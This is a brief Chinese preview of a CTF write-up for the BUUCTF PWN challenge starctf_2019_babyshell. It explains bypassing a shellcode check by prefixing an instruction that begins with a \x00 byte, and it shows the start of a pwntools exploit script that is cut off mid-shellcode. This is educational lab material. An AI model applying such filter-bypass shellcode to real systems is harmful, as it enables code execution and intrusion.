starctf专题
![[BUUCTF]-PWN:starctf_2019_babyshell解析(汇编\x00开头绕过+shellcode)](https://img-blog.csdnimg.cn/direct/a949ec553e14483895f9220c11c0f31c.png)
[BUUCTF]-PWN:starctf_2019_babyshell解析(汇编\x00开头绕过+shellcode)
查看保护 查看ida 这里就是要输入shellcode,但是函数会有检测。 在shellcode前面构造一个以\x00机器码开头的汇编指令,这样就可以绕过函数检查了。 完整exp: from pwn import*context(log_level='debug',arch='amd64')p=process('./babyshell')shellcode=b'\x00\